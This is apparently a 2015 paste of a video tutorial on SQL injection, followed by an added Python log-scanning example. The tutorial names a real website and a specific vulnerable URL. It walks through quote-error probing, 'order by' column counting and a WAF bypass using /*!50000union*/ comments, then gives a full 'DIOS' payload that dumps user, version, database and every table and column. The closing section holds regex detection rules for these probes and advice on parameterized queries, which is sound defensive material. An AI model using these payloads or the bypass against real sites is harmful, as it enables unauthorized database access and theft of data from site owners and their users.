
SQL Injection First Lecture - Just Do It

a guest
Oct 6th, 2015
  1. Hello guys, how are you...
  2. I am fine ...
  3. So today you will learn the basics of SQL injection
  4. .......
  5. I am hasan afaque ... :)
  6. I hope you all are fine
  7. So today we learn how to inject a vulnerable website..
  8. So let's start
  9. So you have some knowledge about SQL
  10. If you do not know what SQL is .. I will describe it now ..
  11.  
  12.  
  13.  
  14. SQL stands for Structured Query Language and it is a database :)
  15.  
  16. So now let's talk about SQL injection, what is it?
  17.  
  18. So let's start :)
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25. Q1:) What is SQL?
  26. Ans:) SQL stands for (Structured Query Language) and it was first introduced as a commercial database
  27.  
  28. system in 1979 by Oracle Corporation.
  29. Q2:) What is SQL Injection?
  30. Ans:) An SQL injection is a kind of injection vulnerability in which the attacker tries to inject arbitrary
  31.  
  32. pieces of malicious data into the input fields of an application.
  33.  
  34. So today we will inject a site.
  35.  
  36. Site :: http://www.egyankosh.in/
  37. Injecting Point :: http://www.egyankosh.in/campus.php?id=207
  38.  
  39. Requirements
  40. 1) HackBar (I will give the link in the description :) so do not worry :) I will upload HackBar)
  41. 2) Some knowledge about SQL (if not ... open google.com and learn from it =D)
  42. On the desktop I have HackBar
  43.  
  44. So now I add HackBar to Firefox :)
  45. Watch carefully :)
  46.  
  47. Press F9 to open or close HackBar :) so let's start ...
  48.  
  49. Site is http://www.egyankosh.in/
  50. And this is the injecting point.
  51. So let's go ..
  52.  
  53.  
  54. http://www.egyankosh.in/campus.php?id=207' when we put a quote, an SQL error is generated,
  55. OK, it means the website is vulnerable..
  56.  
  57. So what will we do?
  58. 1) Find the columns of the website
  59. 2) Then union select
  60. 3) Print the tables or columns and your name, user, database ...
  61.  
  62. Going to find the columns of the website
  63.  
  64. To find the columns we will use order by
  65. So let's see
  66. no error
  67. order by 5 .. no error
  68. order by 10 .. error
  69. order by 8 ... error
  70. order by 7 no error ... so there are 7 columns ... :)
  71.  
  72.  
  73. Now our mission is to union select it :) so let's see
  74.  
  75. and put - after id=
  76.  
  77. Error
  78.  
  79. This is a WAF
  80. What is a WAF?
  81. Answer:) It stands for web application firewall
  82. So let's bypass it..
  83. /*5000Union*/
  84.  
  85. http://www.egyankosh.in/campus.php?id=-207 /*!50000union+*/select 1,2,3,4,5,6,7
  86.  
  87. 2 and 5 appear...
  88. That means 2 and 5 are the vulnerable columns ...
  89. We can write our query in 2 and 5 only :)
  90. That means we can execute a query in them .. OK
  91.  
  92. Let's do DIOS ...
  93. DIOS stands for Data In One Shot
  94. .... I can print the tables and columns now with DIOS ...
  95. Union based >> DIOS MySQL >> Zen
  96. Then execute it
  97.  
  98. Wow .. the tables and columns show on the page..
  99.  
  100.  
  101. Now our goal is .. to print name or user or database
  102.  
  103. To print name+user+database+tables+columns .. we will concat them .. so let's concat
  104.  
  105. To print the user we write
  106.  
  107. User()
  108. Database: database()
  109. and the name we can convert to 0x
  110. So let's go
  111. Oof, a Forbidden error again, so again bypass it with /*50000*/
  112.  
  113. Yahoo, bypassed. Now we can break the line..
  114. That means to go to the next line, so we use </br>; in HackBar it's already given, let's use it
  115. Now print the user
  116. Now print the database
  117. For the version :: we can write :: version()
  118. So let's print the columns and tables
  119.  
  120. Tables + columns + user + name .. done
  121.  
  122.  
  123. Thanks for watching ...
  124. Please subscribe to the channel .... Learn and do it
  125.  
  126. ... See you in the next tutorial ...
  127. http://www.egyankosh.in/campus.php?id=-207 /*!50000union+*/select 1,/*!50000concat*/
  128.  
  129. (0x596f754e616d65,0x3c62723e,user(),0x3c62723e,version(),make_set(6,@:=0x0a,(select(1)from
  130.  
  131. (information_schema.columns)where@:=make_set
  132.  
  133. (511,@,0x3c6c693e,table_name,column_name)),@)),3,4,database(),6,7
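
The requests used in this walkthrough (a quote after a numeric id, `order by N` probes, `union select` wrapped in `/*!50000 ... */` comments, `information_schema` reads) all end up in the web-server access log. The following Python is an added example, not part of the original paste: it unwraps MySQL versioned comments before matching, so the comment wrapping shown above does not hide the keywords. The log lines, client addresses, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# MySQL runs the body of /*!NNNNN ... */ as SQL, so keep the body and drop
# only the wrapper; ordinary /* ... */ comments behave like whitespace.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*.*?\*/", re.S)

# Hypothetical rule names; each pattern runs on the normalized query string.
RULES = {
    "quote_in_numeric_id": re.compile(r"\bid=-?\d+\s*['\"]"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "info_function": re.compile(r"\b(user|database|version)\s*\(\s*\)"),
}
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*?) HTTP/[\d.]+" \d{3}')

def normalize(query):
    """URL-decode, lowercase, unwrap comments and collapse whitespace."""
    text = unquote_plus(query).lower()
    text = VERSIONED.sub(r" \1 ", text)
    text = PLAIN.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip()

def scan(lines):
    """Return (client, path, rule names) for each request that matches a rule."""
    findings = []
    for m in filter(None, map(LOG_LINE.match, lines)):
        client, target = m.groups()
        parts = urlsplit(target)
        query = normalize(parts.query)
        hits = sorted(n for n, rx in RULES.items() if rx.search(query))
        if hits:
            findings.append((client, parts.path, hits))
    return findings

# Constructed access-log lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Oct/2015:10:00:01 +0000] "GET /campus.php?id=207 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Oct/2015:10:02:11 +0000] "GET /campus.php?id=207%27 HTTP/1.1" 200 812',
    '203.0.113.9 - - [06/Oct/2015:10:02:40 +0000] "GET /campus.php?id=207%20order%20by%207--+ HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Oct/2015:10:03:05 +0000] "GET /campus.php?id=-207%20/*!50000union+*/select%201,2,3,4,5,6,7 HTTP/1.1" 200 4301',
    '198.51.100.7 - - [06/Oct/2015:10:04:00 +0000] "GET /search.php?q=student+union+elections HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Pattern matching of this kind is for spotting probes in logs; the flaw itself is closed in the application by binding `id` as a query parameter (or casting it to an integer) instead of concatenating it into the SQL string.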